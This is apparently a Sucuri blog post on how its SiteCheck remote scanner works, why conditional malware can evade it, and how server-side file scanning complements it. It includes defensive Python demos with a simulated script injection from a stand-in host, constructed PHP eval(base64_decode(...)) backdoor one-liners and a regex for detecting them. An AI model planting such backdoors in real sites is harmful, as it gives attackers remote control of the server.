Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Sounds simple, but identifying these issues remotely (without server access) is a complicated task, which is why we do not guarantee 100% accuracy. An “All clear” (green) result only means that, at the time of the scan, we could not see anything malicious; it is not proof that the site is clean.

Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed.

How SiteCheck works

SiteCheck is a remote scanner: it visits your site the way an everyday user or a search engine bot would and checks whether any of the pages it can reach contain malicious code. In its simplest form, it does the following:

  1. We visit the main page and extract the list of links, JavaScript files and iframes.
  2. We re-visit the main page acting as a search engine bot.
  3. From the links we extracted, we select 8-10 and visit them using different referrers and user agents.
  4. We extract and scan all JavaScript files and iframes present on those pages.
  5. We run everything we fetched against our large malware database and perform multiple anomaly checks, comparing the results between the different user agents and referrers to see if anything is being hidden from some visitors.
  6. We also check every included resource against multiple blacklists to see if it has been flagged by others, or if we have already seen it on other compromised sites.

As you can see, we only have access to what is visible in the browser. If you have a hidden backdoor inside wp-content/uploads, or a modified core file that doesn’t render anything in the browser, SiteCheck won’t see it. This means it might not detect the following:

  • Phishing pages that only the attacker knows about and that no page links to
  • Hidden links or spam injections that we cannot confirm were inserted by an attacker rather than the site owner

There is also one other very important condition that can affect the scanner’s detection: conditional malware. We have written about this several times. Many newer, more sophisticated strains of malware apply rules to every visit. Those rules dictate when the malicious content does or does not display. The rules vary: some only display to Google IPs, some display only once a day, once per IP, or once a week, and some only under specific conditions of the client’s local configuration. If the rule never fires for our scanner, the scanner sees the same clean page every time.
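The six steps above and the conditional-malware problem, as an added example written for this answer (it is not SiteCheck’s code): a miniature remote scanner that crawls the main page plus a few of its links under several user agent and referrer profiles, compares what each profile saw, and checks the hosts of every included resource against a blacklist. The “site” is an in-memory fake so it runs offline; the HTML samples, the conditional rules in `fake_fetch`, and the `bad.example` blacklist entry are all constructed for the demo.

```python
# Added example (not SiteCheck's code): a miniature remote scanner that follows the
# steps listed above. The "site" is an in-memory fake so it runs offline; the
# HTML, the conditional rules, and the blacklist entry are all constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample: what an ordinary visitor receives.
CLEAN_HTML = """<html><body>
<a href="/about">About</a> <a href="/contact">Contact</a>
<script src="/js/app.js"></script>
</body></html>"""

# Constructed sample: the same page with an extra script and a zero-size iframe
# injected only for search-engine bots or visitors arriving from a search engine.
INJECTED_HTML = CLEAN_HTML.replace(
    "</body>",
    '<script src="http://bad.example/x.js"></script>'
    '<iframe src="http://bad.example/f.html" width="0" height="0"></iframe></body>')

BLACKLIST = {"bad.example"}  # constructed, hypothetical host; not a real indicator

def fake_fetch(url, user_agent, referrer):
    """Stand-in for an HTTP GET that simulates conditional malware: the injection
    is served only when the visitor looks like Googlebot or comes from Google."""
    is_bot = "Googlebot" in user_agent
    from_search = "google." in (referrer or "")
    return INJECTED_HTML if (is_bot or from_search) else CLEAN_HTML

class ResourceExtractor(HTMLParser):
    """Collect links, script sources and iframe sources from a page."""
    def __init__(self):
        super().__init__()
        self.links, self.scripts, self.iframes = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])

def extract(html):
    parser = ResourceExtractor()
    parser.feed(html)
    return {"links": parser.links, "scripts": parser.scripts, "iframes": parser.iframes}

# Visit profiles: (user agent, referrer). The first is the plain-visitor baseline.
PROFILES = [
    ("Mozilla/5.0 (Windows NT 10.0; rv:40.0) Gecko/20100101 Firefox/40.0", ""),
    ("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", ""),
    ("Mozilla/5.0 (Windows NT 10.0; rv:40.0) Gecko/20100101 Firefox/40.0",
     "https://www.google.com/search?q=example"),
]

def host_of(url):
    m = re.match(r"https?://([^/:]+)", url)
    return m.group(1).lower() if m else None

def scan(url, fetch=fake_fetch, max_links=8):
    """Steps 1-6 in miniature: crawl the main page plus a few of its links under each
    profile, compare what each profile saw, and check hosts against the blacklist."""
    seen = {}
    for ua, ref in PROFILES:
        main = extract(fetch(url, ua, ref))
        resources = set(main["scripts"] + main["iframes"])
        for link in main["links"][:max_links]:
            sub = extract(fetch(urljoin(url, link), ua, ref))
            resources.update(sub["scripts"] + sub["iframes"])
        seen[(ua, ref)] = resources
    everywhere = set.intersection(*seen.values())
    anywhere = set.union(*seen.values())
    # Anything not shown to every profile is conditional content: the core anomaly check.
    conditional = anywhere - everywhere
    blacklisted = {r for r in anywhere if host_of(r) in BLACKLIST}
    return {"conditional": sorted(conditional), "blacklisted": sorted(blacklisted)}

if __name__ == "__main__":
    print(scan("http://example.com/"))
```

The comparison is the important part: the plain-visitor profile never sees the injected script or iframe, so a single fetch would report the site clean, while the Googlebot and search-referrer profiles expose them. A rule that fires once per IP or once per day is harder. If it fires on the scanner’s first request only, the remaining profiles see clean content and the difference is still flagged; if it never fires for the scanner’s address, every profile sees the same clean page and the scan reports green, which is exactly the situation the question describes.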

Complementing SiteCheck

Because of these challenges, we introduced server-side scanning for all paying clients (included in all our plans). This scanner crawls every file in your website directory and works to identify hidden backdoors, phishing pages, malware injections, spam and other conditional infections. The two scanners complement one another: each is designed to detect certain things and helps verify what the other catches.

Another benefit of our server-side scanning is that it will generate an audit trail of any file changes, allowing us to see exactly when a compromise happened.
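The server-side side of the picture, from the two paragraphs above, as an added example that is not Sucuri’s scanner: a file-integrity baseline whose diff is the audit trail of what changed and when, plus a content check for the two things a remote scan cannot see, a PHP file dropped into wp-content/uploads (where nothing links to it) and obfuscated code execution appended to a core file. The site tree, the backdoor strings and the single `SUSPICIOUS` signature are all constructed for the demo; a real scanner carries a large signature set plus heuristics.

```python
# Added example (not Sucuri's server-side scanner): a file-integrity baseline that
# yields an audit trail of changes, plus a content check for the two things a remote
# scan cannot see: PHP dropped into wp-content/uploads and obfuscated code execution.
# The site tree, the backdoor text and the signature are all constructed for the demo.
import hashlib
import os
import re
import shutil
import tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def rel_path(full, root):
    return os.path.relpath(full, root).replace(os.sep, "/")

def snapshot(root):
    """Map of relative path -> (sha256, mtime) for every file under root."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            snap[rel_path(full, root)] = (sha256_of(full), os.path.getmtime(full))
    return snap

def diff(before, after):
    """Audit trail: (change, path, mtime) for every file added, removed or modified.
    The mtime is the 'when' a responder wants; the hash is what makes it trustworthy."""
    trail = []
    for rel in sorted(set(before) | set(after)):
        if rel not in before:
            trail.append(("added", rel, after[rel][1]))
        elif rel not in after:
            trail.append(("removed", rel, None))
        elif before[rel][0] != after[rel][0]:
            trail.append(("modified", rel, after[rel][1]))
    return trail

# Constructed, deliberately narrow indicator: an exec-style call wrapped around a decoder.
# Real scanners carry a large signature set plus heuristics; this is one pattern, not the set.
SUSPICIOUS = re.compile(
    rb"\b(eval|assert|system|passthru)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def content_checks(root):
    """Flag PHP under wp-content/uploads (only media belongs there) and files matching SUSPICIOUS."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = rel_path(full, root)
            with open(full, "rb") as f:
                data = f.read()
            if rel.startswith("wp-content/uploads/") and name.lower().endswith(".php"):
                hits.append(("php-in-uploads", rel))
            if SUSPICIOUS.search(data):
                hits.append(("obfuscated-exec", rel))
    return hits

def demo():
    """Build a constructed site tree, take a baseline, simulate a compromise, then audit."""
    root = tempfile.mkdtemp()
    try:
        uploads = os.path.join(root, "wp-content", "uploads", "2015")
        os.makedirs(uploads)
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php require 'wp-blog-header.php';\n")
        with open(os.path.join(uploads, "photo.jpg"), "wb") as f:
            f.write(b"\xff\xd8\xff")
        before = snapshot(root)
        # Simulated compromise (constructed strings): a core file gains an appended
        # eval, and a backdoor is dropped among the uploads where nothing links to it.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("<?php eval(base64_decode($_POST['c'])); ?>\n")
        with open(os.path.join(uploads, "cache.php"), "w") as f:
            f.write("<?php @eval(gzinflate(base64_decode($_REQUEST['x']))); ?>\n")
        after = snapshot(root)
        return {"changes": diff(before, after), "hits": content_checks(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    result = demo()
    for entry in result["changes"] + result["hits"]:
        print(entry)
```

Neither finding is reachable from the browser: the appended eval produces no visible output on index.php, and cache.php is never linked from any page, so a remote crawl never requests it. The baseline diff is what turns “the site is infected” into “index.php changed at this time and a new file appeared here”, which is the starting point for working out how the attacker got in.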

When you couple that with our manual audits (done by our support team and included in all our plans), you start building a very high level of detection confidence in all the sites we monitor.

Conclusion

We hope this clarifies how SiteCheck works, but if it doesn’t, ask more questions and we’ll be happy to respond. Another very important thing all clients need to understand is that our remediation services are not restricted to what we detect automatically. If at any time you feel you may be compromised, you are never more than one ticket away from having us manually hunt it down and remove it for you.

About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid